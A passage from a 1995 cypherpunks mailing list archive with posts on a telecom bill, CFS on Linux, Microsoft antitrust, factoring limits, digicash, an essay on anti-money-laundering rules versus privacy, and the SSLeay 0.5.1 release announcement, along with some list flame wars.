[compared to ~exp(L^1/3) time] by a quantum computer, which simultaneously follows all paths corresponding to distinct classical inputs, obtaining the solution from the coherent quantum interference of the alternatives. Here it is shown how the decoherence process degrades the interference pattern that emerges from the quantum factoring algorithm. For a quantum computer performing logical operations, an exponential decay of quantum coherence is inevitable. However, even in the presence of exponential decoherence, quantum computation can be useful as long as a sufficiently low decoherence rate can be achieved to allow meaningful results to be extracted from the calculation. I. L. Chuang, Stanford University. R. Laflamme and W. H. Zurek, Los Alamos National Laboratory. P. W. Shor, AT&T Bell Labs. ---------- QCF_dec (18 kb) Sent with compressed qcf1.jpg of 14 equations and 2 figures (31 kb) From declan+ at CMU.EDU Wed Dec 20 19:37:24 1995 From: declan+ at CMU.EDU (Declan B. McCullagh) Date: Wed, 20 Dec 95 19:37:24 PST Subject: Surprise telecommunications bill? In-Reply-To: <2.2b7.32.19951221020731.008be6d4@mail.teleport.com> Message-ID: Excerpts from internet.cypherpunks: 20-Dec-95 Surprise telecommunications.. by Alan Olsen at teleport.com > While watching the national news (NBC, I think) they mentioned that there > had been a "surprising agreement on a telecommunications bill". From the > sparse description, it sounded pretty nasty. > > Does anyone have any additional information on this? Yes, and it's not good. This telecom bill is going to be law real, real soon. -Declan --- DOW JONES NEWS 12-20-95 6:29 PM WASHINGTON -AP- Negotiators resolved a dispute over media ownership, removing the last major hurdle to an overhaul of laws governing the nation's communications industry. Once approved by Congress, the White House pledged to sign the legislation into law. ''This is an extremely positive development for the U.S. economy, for individuals and for consumers alike,'' Vice President Al Gore said during an interview in his office. President Clinton, who had threatened to veto earlier provisions of the measure, will sign what Gore called ''a centrist bill for the 21st century.'' From grafolog at netcom.com Wed Dec 20 20:01:37 1995 From: grafolog at netcom.com (Jonathan Blake) Date: Wed, 20 Dec 95 20:01:37 PST Subject: (fwd) Junk email address collection (from a junk emailer) In-Reply-To: Message-ID: On Wed, 20 Dec 1995, attila wrote: > and, coming down on DejaNews just puts the fire out in just one > room of a conflagration. Especially since DejaNews is neither the first, or most thuro in archiving usenet messages. I still want to know who is feeding netcom.shell.* to he outside world, so that excite can document every whisper there. > for amusement, I have started to code a simple program which > takes a feed from procmail where known spammers are listed and it I want a copy of that program. xan jonathon grafolog at netcom.com **************************************************************** Opinions represented are not necessarilly mine. OTOH, they are not representations of any organization I am affiliated with, either. WebPage: ftp://ftp.netcom.com/gr/graphology/home.html For a good prime, call 391581 * 2^216193 - 1 ********************************************************************** From mab at crypto.com Wed Dec 20 20:34:57 1995 From: mab at crypto.com (Matt Blaze) Date: Wed, 20 Dec 95 20:34:57 PST Subject: CFS and Linux In-Reply-To: <199512201915.UAA00215@asylum.berserk.com> Message-ID: <199512210440.XAA28196@crypto.com> > > Is there anyone out there that has CFS running with Linux ? > > It installs fine on BSDi 2.0 but I'm unable to install it > under Linux, I would appreciate it if some one would help > me out. > > -AJ- I don't run Linux, and every time I open my mouth it seems to provoke a flame-fest, but I'll risk responding anyway. I'm told that all version of CFS since 1.0.4 (the latest is 1.3.1) do work out-of-the-box under *some* releases of Linux and with some coaxing on the others. I'm not sure exactly what problem you're having, but the most common CFS-Linux problem that people complain about has to do with the rpcgen output not being in the format expected by the rest of CFS. There seem to be two things you can do about this: get a version of rpcgen that generates the "standard" (original Sun) names for the functions it generates, or just grab the rpcgen output from the cfs-users mailing list archive ("echo help | mail cfs-users-request at research att.com" for details). Or are you able to compile it but not get it installed? I've not heard of any problems here. If so, you might try the cfs-users at research.att.com mailing list and see if someone there can help out. -matt NB to "Bill Gates" and friends: To save you the trouble of pointing it out, I hereby admit that I'm a commie-fascist brainwashed sold out member of the military-industrial complex who has been programmed by his masters to infiltrate the cypherpunks in order to sap and impurify their precious bodily fluids. From attila at primenet.com Wed Dec 20 20:49:27 1995 From: attila at primenet.com (attila) Date: Wed, 20 Dec 95 20:49:27 PST Subject: Vladimir Z. Nuri's fallacious defense of MS In-Reply-To: <199512210204.SAA26757@netcom20.netcom.com> Message-ID: Without forcing everybody to search the interline comments. 1) you obviously have no concept of anti-trust or anti-competitive law, practice or the public interest it represents. I wrote my thesis on government regulation of monopoly v. monopoly franchises such as utilities. 2) market domination can, and generally does, stifle competition, but it also kills innovation of alternatives. Software companies are too busy kissing arse with Bill, and threatened by Bill, to release software on other systems say unix or os/2. a perfect example is Corel. Corel was _very_ enthusiastic to release for OS/2, in fact they were ported to OS/2 before W95 released. Shortly after the announcement, the honcho reversed positions and canceled Rev 6 for OS/2 stating that Rev 2.5 which has existed for some time, was "adequate" for OS/2. I am not going to expose my inside source, as their will be retribution. 3) you are totally ignoring the comments on anti-thrust and restraint of trade. In general market terms, anti-thrust is less important than restraint of trade --Bill _clearly_ violates the rules on restraint of trade, and therefore should be dismembered to avoid lack of innovation as in #2 above. 4) you clearly have no concept of American free market policy. Yes, you may be very successful, even filthy rich, but when you stretch your rights to clearly offend the public interest, then anti-trust and restraint of trade laws serve the _needs_ of a free and _competitive/innovative_ market. America does not serve dinner to merchants who rape, pillage, and burn --as Bill Gates has crushed his opponents; the barbarians are punished. There are grounds for criminal charges in Bill's actions. 5) you are incorrect in your assumptions that Gates was sued anonymously. In the initial action by the DOJ, competitors were _asked_, by subpoena, for factual information by the DOJ. The _DOJ_ provided the shield in so much as Bill's barbarian actions were of sufficient interest that evidence providers desired and were given protection --not much different than the Federal Witness Protection program. when CI$ and the rest banded together to protest Bill's obvious restraint of trade and stonewalling on hooks to Win95 for three months after Win95 released, they did not, and _could_ not, do so anonymously. 6) how much is Bill paying _you_ for your efforts? You obviously have too much of an interest in the commercial outcome to be so ignorant. 7) Your beliefs are one thing --state 'em, but don't speak for America until you know the definition of the "public interest" and have some concept of anti-trust and restraint-of-trade legislation and court rulings which have set the guidelines. clutch it in, _after_ your brain is in gear. 8) no, I am not a liberal by any means. I am somewhere to the right of the Libertarians, but definitely not an anarchist either. ANY FURTHER COMMENTS --FORWARD TO ALT.FLAME From attila at primenet.com Wed Dec 20 21:20:30 1995 From: attila at primenet.com (attila) Date: Wed, 20 Dec 95 21:20:30 PST Subject: An Apology to Mr. Merzger In-Reply-To: Message-ID: congratulations, Dan. It takes a strong man to admit mistakes, and courage to apologize! attila On Wed, 20 Dec 1995, Dan Harmon wrote: > > Perry and members of this list, > > I want to publicly apologize to Mr. Metzger. On reviewing the events of the > day, it seems that I misunderstood a post by Perry. It seems that I was > missing a previous post that was being referenced. As to the > misunderstood message, I have to now agree with Perry and his reponse. > > Please accept this apology. > > Dan > > From roy at cybrspc.mn.org Wed Dec 20 21:21:54 1995 From: roy at cybrspc.mn.org (Roy M. Silvernail) Date: Wed, 20 Dec 95 21:21:54 PST Subject: The Problem With Blaze And Weinstein In-Reply-To: <199512210112.BAA05503@pangaea.ang.ecafe.org> Message-ID: <951220.231202.6s3.rnr.w165w@cybrspc.mn.org> -----BEGIN PGP SIGNED MESSAGE----- Hey, "Bill Gates"... I agree completely that the both you and Dr. Frederic B. Cohen are of equal value in your contributions to the cypherpunks list. alpha.c2.org offers 'nym accounts for free. PLEASE get and use one, so I can put you in my killfile, next to Dr. Frederic B. Cohen. - -- Roy M. Silvernail -- roy at cybrspc.mn.org "I used to be disgusted, but now I'm just amused." -- from an old T-shirt(ca. 1975), not an Elvis Costello lyric -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMNjtZhvikii9febJAQEDMQP/fTurXMuhXRaNZYRicFOwMebofxkWgYqc DSa1HlzovcEJLlsxcpZ8J35VrW/q/pdPJhrl0if/kdA1euO4+H/riG44tuwRT70e kZ7jRMxj3bRRT5HyVhaRsiDmN4COOORfuD9sTzqiGNNrTAS7CVZC2UOU6wSWBIrG cCoER8/HBEw= =TVG/ -----END PGP SIGNATURE----- From tcmay at got.net Wed Dec 20 21:54:35 1995 From: tcmay at got.net (Timothy C. May) Date: Wed, 20 Dec 95 21:54:35 PST Subject: What ever happened to... Cray Comp/NSA co-development Message-ID: Anitro wrote: >O.K. Just a factor of 16 increase over the CM architecture right? Not knowing >the computational capabilities of the individual processors, it might be >difficult to say what the machine is capable of. Wouldn't that have some >bearing? Not in cracking "truly large" problems by brute force. Even if each of the million processors is capable of 100 MIPS (which is unlikely, given the PIM approach and the fine-granularity, few-bit-or-less word size, etc.), this is only 10^8 MIPS. For problems that (for instance) 10^75 machines would have to spend 10^10 years on, not even a drop in an ocean. The point is that no existing machines are going to make a dent in these calculations, though algorithmic cleverness _might_ make factoring much easier (personally, I doubt it). >> Second, there was work on a "processor-in-memory" architecture, in >> conjunction with a Bowie, Maryland spook-connected company. Perhaps this is >> what you are thinking of? > >I didn't mention a 'processor-in-memory' architecture and neither did the NYT >article. Don't know about any other company involvement, just CCC and NSA. I wrote my response before seeing the other response someone else (Thaddeus J. Beier) gave the name of the company. Thad's details match what I recall about this Bowie company. The archives should have articles on this, dating back about a year or so ago. As I recall, someone on the list knew people working at the Supercomputer Research outfit. >> Third, all avenues of continued funding having fallen through, Cray >> Computer (not Cray Research, of course) was shut down and assets >> liquidated. I haven't heard what's become of Seymour, though. (He is >> undoubtedly an asset, buy I doubt the Agency would have him liquidated.) > >You mean the avenues that are of PUBLIC record. The possibility could always >exist that the development continues 'in-house'. It wouldn't be the first time >that sort of move has been played. You, whoever you are, asked about the operational status of Cray Computer, and I answered. It entered Chapter Seven liquidation, parts of existing computers were sold for scrap or museum/curio objects, the GaAs fab was sold to another company, and the employees scattered. Claiming the NSA moved it "in-house" is implausible, at least in terms of these events. >> Huh? First, what evidence do you have for this claim? Second, who cares? >> Implementing Clipper in a Cray Computer machine--why bother? > >[Rant mode on] >Speculation Tim... I'm SPECULATING. Could, in theory... AND my kind of theory >probably has holes you could drive a FLEET of Mack trucks through. I have NO >evidence. I'm not sure WHO would care. I'M A PARANOID DILLUSIONAL PSYCHOPATH! >O.K. well maybe not that last part... but I'm asking the questions, remember? >I said I'm new here, so if your going to blow holes in my pet theories, then >do me the 'kindness' of using an accurate weapon... that's why I posted... I asked what evidence you have for this claim. Idle speculation, based on innumerate estimates of plausibility are helpful to no one. >> As to the claim that a million-processor machine could do this, you need to >> work out the math. (If a backdoor exists, or the LEAF has been gotten, a >> supercomputer is not needed....) > >Again... I claimed NOTHING! SPECULATED MUCH! Now it's your turn... Why would >YOU build a machine like this? What could POSSIBLY be it's capabilities? >Speculate with me for a moment... *_take a chance_*. On our list, and in the circles I am familiar with, "speculations" are not treated with more respect than are actual "claims" (whatever they are). If you speculate that "really, really fast computers" will make today's ciphers insecure, based on not even the simplest of calculations, expect to be either ignored or called to task. This is the way science works, by falsification of theories (and speculations). >> If you mean using supercomputers to brute force the general factoring of an >> RSA modulus, this is nonsense. While there may be math shortcuts we don't >> yet publically know about which make factoring easier than we currently >> think it is, a mere million or even a billion processors will not make a >> dent in the factoring of, say, a 700-digit modulus. See the tables in >> Schneier and elsewhere for some estimates of factoring efforts needed. > >Nonsense? Is that 700 decimal digits or 700 binary digits? I don't have the >tables that you refer to. Where may I find them? (LOL) A 2048-bit key, such as many of us use, uses a roughly 700-decimal-digit modulus. "Schneier," mentioned in my paragraph, is "Applied Cryptography." Page 284 of the 1st Ed. has a discussion of the work involved in factoring large moduli. Rivest has made some more detailed estimates. Given your rudeness and self-professed ignorance of even the basic math, I see no point in wasting any more of my time on your posts. --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From ses at tipper.oit.unc.edu Wed Dec 20 22:56:02 1995 From: ses at tipper.oit.unc.edu (Simon Spero) Date: Wed, 20 Dec 95 22:56:02 PST Subject: Digicash and capital adequacy Message-ID: This came out of a corridor discussion yesterday as to how digicash would affect future banking systems: How does digicash interact with capital adequacy requirements? Should each digi-dollar issued require a corresponding hunk'o'assets in the customers account, or should the bank be able to issue digicash using existing rules? Digicash can have a much faster velocity than real cash, so I can sort of imagine their being periods where adequacy limits could be exceeded. What's the panels view? Simon p.s. I got to see the movie "Hackers" while I was sick in bed after WWW IV. The movie was pretty bogus, but the soundtrack was pretty cool. The wonderful movie website had nothing about any soundtrack albums; anyone know if there was one? From jamesd at echeque.com Wed Dec 20 23:13:26 1995 From: jamesd at echeque.com (James A. Donald) Date: Wed, 20 Dec 95 23:13:26 PST Subject: QCF_dec Message-ID: <199512210713.XAA09335@blob.best.net> --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From gbroiles at darkwing.uoregon.edu Wed Dec 20 23:24:01 1995 From: gbroiles at darkwing.uoregon.edu (Greg Broiles) Date: Wed, 20 Dec 95 23:24:01 PST Subject: the problem with attacks on Blaze & Weinstein Message-ID: <199512210723.XAA25191@darkwing.uoregon.edu> The "Blaze & Weinstein are devils in disguise" business is ridiculous, as is the notion of "cypherpunk purity". Cypherpunks is a mailing list. If Blaze and Weinstein were up to something especially tricky, they'd probably post from accounts not traceable to their employers (like, say, anonymous remailers). Suggesting that a person is not to be trusted because they work for organization "X" is particularly silly where the suggestor isn't willing to provide the details of their own organizational ties. This is a mailing list. Mailing lists are for discussing things - like technological defenses for privacy. People may have interesting things to contribute because of, in spite of, or irrespective of their employment or other relationships with large organizations. (And, in fact, they do. Both Matt Blaze and Jeff Weinstein have done and said pro-privacy things despite the equivocal-to-hostile stance their employers have taken with respect to privacy. Brian Davis, the list's token prosecutor :), has recently been sending messages re the limits of governmental power in the context of criminal investigations. Microsoft employees have posted re Microsoft's choices about privacy and encryption/security. And so on.) If this were a secret organization and we were splitting up into individual cells for revolutionary/forbidden activity, your suspicion/paranoia might be useful. But we're not (it's an open list, archived on full-text searchable Web servers), so it's not. And, apart from whether or not they're valuable list contributors, the list really isn't in a position to not "tolerate" unwanted or unproductive readers or authors. The tools which make identity difficult to fix make it difficult to restrict/deny access to an unpopular or unwanted identity. Get used to it. Adapt or die, hmm? -- "The anchored mind screwed into me by the psycho- | Greg Broiles lubricious thrust of heaven is the one that thinks | gbroiles at netbox.com every temptation, every desire, every inhibition." | -- Antonin Artaud | From sdavidm at iconz.co.nz Wed Dec 20 23:24:52 1995 From: sdavidm at iconz.co.nz (David Murray) Date: Wed, 20 Dec 95 23:24:52 PST Subject: The War on Some Money [long] Message-ID: -----BEGIN PGP SIGNED MESSAGE----- [Yes - money laundering _again_.] I want to advance two theses: 1. That the interest and activities of governments in fighting money-laundering is directly contrary to the interest and activities of those seeking to develop anonymous digital commerce; 2. That there is a related, if not underlying, conflict between the rhetoric of concealment and the rhetoric of privacy. If the push for anonymous digital commerce is exemplified by the Cypherpunks (and let's pretend it is), the battle against money-laundering is being led by the Financial Action Task Force (FATF), an autonomous international entity, set up by the G7 as part of the orgy of post-cold-war co-operation between States on this issue. The UN, G7, OAS, Commonwealth, EU and a host of supra- national bodies have called for co-ordinated action on stamping out dirty money. And in an unprecendented fashion, States have responded. There are over 100 States that either have or are considering the criminalisation of money- laundering. These include, by and large, the tax havens of Europe, the Carribbean and the South Pacific. So what is criminal money laundering? Concealing the source of funds that one knows come from serious crime. Three comments about this formulation: 1. The state of mind required is knowledge, although this knowledge can be inferred from objective facts (and knowledge tests in criminal definitions are notoriously elastic). 2. The source of funds must be serious crime. The early UN declaration only referred to drug dealing, but since 1990 there has been a move to widen this to all serious crime. As to what constitutes serious crime, this is still somewhat up for grabs. Some of the BSA's statements about software piracy being the drug dealing of the nineties, and linking piracy with organised crime can be seen as a strategy to position large scale intellectual property theft as serious crime. More ominous (at least for the relationship of citizen and state) is the occasional reference to tax evasion in the same breath as serious crime. 3. This is because the serious crime need not be committed in the same country as the money laundering. This makes sense for conventional serious crime (to coin a phrase), but if tax evasion is included represents a major departure from the convention that the courts of one country will not enforce the taxing statutes of another. Note also the possibility that fraud might be serious crime, which, since the test of fraud is dishonesty, directly brings the competing ethical (or rhetorical) systems into conflict. But more of this below. The key feature of the new supra-national regime, however, is not a more or less co-ordinated criminal law (there are some marked variations on the above scheme), but the new surveillance approach to the financial system. The most obvious signs of this are the requirement of financial institutions to "know your customer" (which includes an explicit prohibition of anonymous accounts) and to report "suspicious" transactions. But the approach goes much further. The FATF's chilling Forty Recommendations (on which the global approach is largely based) urges countries to "further encourage in general the development of modern and secure techniques of money management, including increased use of cheques, payment cards, direct deposit of salary cheques, and book entry recording of securities, as a means to encourage the replacement of cash transfers." [This is taken from a synopsis of the Recommendations.] In case anyone should think this is based on the insecurity to the _customer_ of cash and bearer securities, the FATF suggests countries (i.e. Governments) may like to consider monitoring all domestic financial transactions with a view to building databases for computer analysis -- such databases to be appropriately secured from unauthorised access, of course. So there we have it. The FATF wants a cashless, book entry, universally monitored financial system based on verified True Names. Some Cypherpunks want a cash based, bearer certificate, mathematically unmonitorable financial system revolving around impenetrable pseudonyms. Another way to put this is that Cypherpunks are for privacy, but the FATF is against concealment. Three arguments are often made for the attack on money laundering. 1. Money laundering leads to the corruption of societies and the undermining of institutions and States. This seems to be putting the cart before the horse, somewhat. Even if you consider money laundering as an inextricable part of rendering crime organised, the crimes usually cited (drug dealing, environmental crime, and the smuggling of cultural artifacts [!]) could be decriminalised relatively easily. And of course you could always abolish the State :-) 2. Money laundering puts the financial system at risk. (This, of course, is why the financial institutions used in the Pizza Connection money laundering chain (Merrill Lynch, E F Hutton, Bankers Trust, Barclays, Chase Manhattan, Chemical Bank, Citibank, American Express and Thomas Cook. Bank of Nova Scotia, Ueberseebank (Switzerland)) have without fail spectacularly collapsed.) In so far as this is a result of legislation providing for the forfeiture to the State of the proceeds of crime, another solution is clearly available. 3. The War on Drugs has been a failure, because it isn't in anyone in the drug distribution chain's interest to assist authorities. The financial system is organised crime's exposed flank. (As an(other) aside, it is often mentioned (asserted?) that terrorists are turning to drug dealing etc to finance their terror campaigns. I'm not sure whether this is intended to combat the "drug dealers are just businessmen" argument, or the "terrorists are just patriots" one. Perhaps both.) [Don't get me wrong. I'm not saying Statists are bad because drug dealers are good. I realise that reasonable people can differ as to the trade off between civil liberties and the protection of the State. I know people who think that it is all right to let the Police randomly breath test drivers in order to decrease road deaths. So I can easily imagine people might feel having to front up with two types of ID to open a bank account is a small price to pay to prevent the violence and misery of drug addiction. I happen to think both sets of people are wrong, and dangerously so.] So governments fight money laundering to make it harder for criminals to enjoy the wealth governments can't stop them making. As a side effect, governments gain valuable intelligence about everyone's everyday finances. And we might as well look at cracking down on those evil tax evaders while we're at it... Well -- even I'm willing to admit this summary is a tad glib. It misses something important about attitudes to secrecy: whether secrecy is about privacy or concealment. Michael Froomkin often [:-)] cites Sissela Bok on the danger of secrets inappropriately kept (see e.g. A. Michael Froomkin, "Anonymity and its Enmities," 1995 J. Online L. art. 4, par. 51) -- and certainly the overtones of locked doors, masks, whispers and shadows makes "secret" itself a suspect word. To be open is almost always good; to be secretive is definitely always bad. This sense of the inherent evil of secrets (dark secrets, guilty secrets) runs deep. Take the Equiticorp criminal trial (a local cause celebre of a few years ago) where executives of a company that failed spectacularly after the '87 crash were charged with (inter alia) conspiracy to defraud. The executives in question had caused a large sum of money of (at that time) completely unknown provenance (the so called H-Fee) to be paid to themselves through a series of companies in tax-haven/banking secrecy jurisdictions. The judge (there was no jury) found that, because no one had offered an honest reason to use such a structure, it could only have been for the purpose of concealment of the source of the money from those who may have had a legitimate interest in determining it (IRD, auditors etc.). This amounted to dishonesty, and the charge of conspiracy to defraud was made out. Note the reasoning here: a secret without a reason is concealment; concealment is dishonest. (Cypherpunks would reason exactly oppositely: a secret is an expression of privacy; privacy is good.) We can extend the concealment reasoning in an interesting way: concealment -> dishonesty -> fraud -> serious crime + concealment -> money laundering. So widespread concealment can (conceivably) give rise to an offence of money laundering with no other illegal act. The very fact that the State has an interest in detecting money laundering strengthens that first link: concealment - -> dishonesty. For the cypherpunks, of course, privacy -> nothing at all. Secrecy=privacy is the default. Secrecy=concealment is a red herring. This is not the forum to recite the virtues of privacy. So I'll leave you [at last, they cry!] with a sugestion as to its main (rhetorical) vice: privacy is opposed to public, and public is (usually) good. I'll go further. In the same way that "secret" gives rise to a cascade of negative associations, "public" gives rise to a chain reaction of happy, if not down right noble, thoughts: the public good; public service; the public's right to know; and, of course, the republic itself. Private (and privacy), on the other hand, gains meaning from its distinction from public -- it is _inherently_ negative. All this is so much old rope for those who reject the linguistic turn in philosophy, but I find it a useful way of thinking about trends. And we are seeing trends towards individuality, the rejection of the collective, the privatisation of what once was public. Part of this will be the reversal of the privilegeing of public over private, and the consequent/connected move from secrecy=concealment to secrecy=privacy. And a tangble manifestation of all that will be the rise of anonymous digital commerce, and the abandonment of The War on Some Money. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMNkJOVlo3j8JHzalAQGA/gP8D1mKUVyzybOVuI2AknuznciwghtvndH9 I0GtFnti8zFANMo6LIqb5/Hlz/XDTG6SFZR5D9omFlAd/J781pInaiEtTfXr/y+M BXOppcvXfo28adGR5bgi+JLoZE9XQ511Qrz+HKi7Oa47LudySpRHkd/THM1Wamnw 9aWkxh5JOXs= =FoHd -----END PGP SIGNATURE----- [Palmtop News Reader - Beta Version 3] From eay at mincom.oz.au Wed Dec 20 23:43:12 1995 From: eay at mincom.oz.au (Eric Young) Date: Wed, 20 Dec 95 23:43:12 PST Subject: SSLeay 0.5.1 Message-ID: SSLeay 0.5.1 is now available. It should be quite stable and has documentation for the lower level cryptographic routines. It is incompatible with the previous version but has no global variables of consequence so it should be a much nicer starting point for threaded libraries. The library should have no memory leaks and the general cryptographic functionality has been filled out more. Tim Hudson will be updating the applications available on ftp.psy.uq.oz.au in the next few days. I leave for an 11 week holiday today so please address any problems and questions to the ssl-users at mincom.oz.au mailing list (if it is of general interest) or to ssleay at mincom.oz.au which goes to both myself and Tim Hudson (who will be fixing any bugs while I'm away). Anouncing software and then leaving for 3 months would probably not normally be considered a good practice but 0.5.0 has been tested for the last week or so and I have faith in Tim Hudson's ability to fix bugs after doing pre-alpha testing for the last 6 months :-) As per usual, the primary ftp site is ftp://ftp.psy.uq.oz.au/pub/Crypto/SSL http://www.psy.uq.oz.au/~ftp/Crypto Documentation on the demo application is sparse but I hope Tim Hudson will be able to fill in the gaps while I'm away :-) eric -- SSLeay v 0.5.1 21/12/955 Copyright (c) 1995, Eric Young All rights reserved. This directory contains Eric Young's (eay at mincom.oz.au) implementation of SSL and supporting libraries. The current version of this library is available from ftp://ftp.psy.uq.oz.au/pub/Crypto/SSL/SSLeay-x.xx.tar.gz There are patches to a number of internet applications which can be found in ftp://ftp.psy.uq.oz.au/pub/Crypto/SSLapps/ A Web page written by Tim Hudson can be found at http://www.psy.uq.oz.au/~ftp/Crypto This Library and programs are FREE for commercial and non-commercial usage. The only restriction is that I must be attributed with the development of this code. See the COPYRIGHT file for more details. Donations would still be accepted :-). The package includes libssl.a: My implementation of Netscapes SSL v 2 protocol. This library implements the SSL protocol. libcrypto.a: General encryption and X509 stuff needed by SSL but not actual logically part of it. It include routines for the following: libdes - My libdes DES encryption package which has been floating around the net for a few years. It includes 15 'modes/variations' of DES (1, 2 and 3 key versions of ecb, cbc, cfb and ofb; pcbc and a more general form of cfb and ofb) a fast crypt(3), and routines to read passwords from the keyboard. RC4 encryption, IDEA encryption - 4 different modes, ecb, cbc, cfb and ofb. MD5 and MD2 message digest algorithms, SHA (SHA-0) and SHA-1 message digest algorithms, RSA encryption/decryption/key generation. There is no limit on the number of bits. Diffie-Hellman key-exchange/key generation. There is no limit on the number of bits. X509 encoding/decoding into/from binary ASN1 and a PEM based ascii-binary encoding which supports encryption with a private key. Programs in this package include enc - a general encryption program that can encrypt/decrypt using one of 17 different cipher/mode combinations. The input/output can also be converted to/from base64 ascii encoding. dgst - a generate message digesting program that will generate message digests for any of md2, md5, sha (sha-0) or sha-1. asn1parse - parse and display the structure of an asn1 encoded binary file. rsa - Manipulate RSA private keys. dh - Manipulate Diffie-Hellman parameter files. crl - Manipulate certificate revocation lists. x509 - Manipulate x509 certificates, self-sign certificates. req - Manipulate PKCS#10 certificate requests and also generate certificate requests. genrsa - Generates an arbitrary sized RSA private key. gendh - Generates a set of Diffie-Hellman parameters, the prime will be a strong prime. ca - Create certificates from PKCS#10 certificate requests. This program also maintains a database of certificates issued. verify - Check x509 certificate signatures. speed - Benchmark SSLeay's ciphers. s_server - A test SSL server. s_client - A test SSL client. s_time - Benchmark SSL performance of SSL server programs. Documents included are A Postscript and html reference manual (written by Tim Hudson tjh at mincom.oz.au). A list of text protocol references I used. A initial version of the library manual. To install this package, read the INSTALL file. This library has been compiled and tested on Solaris 2.[34] (sparc and x86), SunOS 4.1.3, DGUX, OSF1 Alpha, HPUX 9, AIX 3.5(?), IRIX 5.[23], LINUX, NeXT (intel). For people in the USA, it is possible to compile SSLeay to use RSA Inc.'s public key library, RSAref. From my understanding, it is claimed by RSA inc. to be illegal to use my public key routines inside the USA. Read doc/RSAref.doc on how to build with RSAref. Read the documentation in the doc directory. It is quite rough, but it lists the functions, you will probably have to look at the code to work out how to used them. I will be working on documentation. Look at the example programs. There should be a SSL reference manual which is being put together by Tim Hudson (tjh at mincom.oz.au) in the same location as this distribution. This contains a lot more information that is very useful. For a description of X509 Certificates, their use, and certification, read rfc1421, rfc1422, rfc1423 and rfc1424. ssl/README also goes over the mechanism. We have setup some mailing lists for use by people that are interested in helping develop this code and/or ask questions. ssl-bugs at mincom.oz.au ssl-users at mincom.oz.au ssl-users-request at mincom.oz.au This library is reasonable stable now. Version 0.5 has had extensive rewriting since version 0.4. The purify package has been used extensively and I believe most if not all memory leaks have been removed. There are no writable global variable so a multi-threaded/DLL version of the library should be quite simple to write. Look at TODO for a list of thinks I know I still need to do. eric (December 1995) Eric Young (eay at mincom.oz.au) 86 Taunton St. Annerley 4103. Australia. From nobody at REPLAY.COM Wed Dec 20 23:55:10 1995 From: nobody at REPLAY.COM (Anonymous) Date: Wed, 20 Dec 95 23:55:10 PST Subject: Cypherpunks resumes? Message-ID: <199512210755.IAA28350@utopia.hacktic.nl> Is there any chance of seeing a Cypherpunks 'Rogues Gallery' of sorts in the archives anytime soon? It would be nice to see a face connected to the postings here. Some of us don't get the chance of getting out west for the parties, The only other thing I know about Tim May besides being one of the Fathers of the Cypherpunks is that he was a naked hippie in a hot tub at some party that Robert Hettinga was at some weeks ago, That doesn't paint a good picture for me. Thanks, A.E.N. From blancw at accessone.com Wed Dec 20 23:57:23 1995 From: blancw at accessone.com (blancw at accessone.com) Date: Wed, 20 Dec 95 23:57:23 PST Subject: The Problem With Blaze And Weinstein Message-ID: <9512210757.AA25763@pulm1.accessone.com> >From the Fool on the Hill(aka ECafe): ATT and Netscape are both tools of the CIA/NSA. Blaze and Weinstein are in on the plot to force GAK upon us.... ..Only true visionaries like myself and Dr. Frederic B Cohen are telling it like it is; everyone else has had the wool pulled over their eyes by the NSA/ATT/Netscape axis. ................................................... Surely you're joking, Mr. Feynman! Cpunks, do you not "get it" - This has to be a jest, poking at some of the attitudes which have been expressed on the list. I think it's a bit late, though, as most of the excitement has calmed, and this must be why it's not recognizable. (if you think it's worth a comment, at least make it *funny*!, right.) .. Blanc From blancw at accessone.com Wed Dec 20 23:57:34 1995 From: blancw at accessone.com (blancw at accessone.com) Date: Wed, 20 Dec 95 23:57:34 PST Subject: on web standards: sent to Markoff Message-ID: <9512210757.AA25767@pulm1.accessone.com> Attila: I'm surprised at you. I thought you were anarcho-capitalist. Oh, well; I have a few pithy comments in reply to your post (but anything beyond this will be in private email). I'm tempted to say back to you, as you just recently stated: "if you have not walked in the other's shoes, keep silent." Have you read any of the books on Microsoft or Bill Gates? I think this would provide you with additional perspective on your conclusions about him and the company. But think about this: . no company which MS has done business with has been coerced into dealing with the company and its products. Those who felt compelled to do business on Billg's terms were influenced by their desire to reap the lucrative benefits of it. . no customer has been coerced into purchasing the products offered; they were not prevented from shopping for computers from companies which do not pre-install the OS; if it was already installed on the machines they purchased, they were free to delete it, they were not coerced into using it or into upgrading to the next release. . not only have many software companies not take advantage of the opportunities created for cashing in on the unexpected popularity of MS software, . there have been occasions where competitors failed to see opportunities in the market which Microsoft did and took aim for, or . attempted business deals/associations among competitor software companies did not come about, thus failing to create a concerted competitive threat to Microsoft, or . a dominant software product from a competitor suffered in the market place, (sometimes from the fault of "bad management"), thus again giving the advantage to Microsoft. Often it has been what the competition *didn't do*, which gave Microsoft the advantage in the "market place", rather than any amazing magical business savvy or "unethical business practices". Nevertheless, as someone at MS said, "it isn't the customers who are complaining". There have been many willing participants, apparently, who have cooperated (or "conspired", if you will) in making the company the success which it has become. And continue to do so. .. Blanc p.s. Nuri-logical: I like your idea for a "dog-eat-dog" welfare fund. From vznuri at netcom.com Thu Dec 21 00:22:40 1995 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Thu, 21 Dec 95 00:22:40 PST Subject: attila's fallacious flagwaving In-Reply-To: Message-ID: <199512210819.AAA01149@netcom9.netcom.com> >1) you obviously have no concept of anti-trust or anti-competitive > law, practice or the public interest it represents. I wrote my > thesis on government regulation of monopoly v. monopoly > franchises such as utilities. neither do you, mr. pseudonym. notice how nothing that MS does even remotely resembles the *utility* business, and how painfully absurd it would be to imply such a thing were so... your point above, while seemingly implying something significant, in itself gives absolutely no evidence for what you claim (i.e. that I don't have a clue). this is quite similar to your essay in which you say that "MS *clearly* violates free/fair trade" with nothing to support your case other than innuendo. I am not going to play ----sizewars with you, I wouldn't want to damage your obviously fragile selfesteem. I wouldn't *want* to be an expert on the ridiculous legislative laws that go under the idea of "antitrust", which are just a convenient excuse in most cases for the government to interfere with business when the public is whining a lot. > 2) market 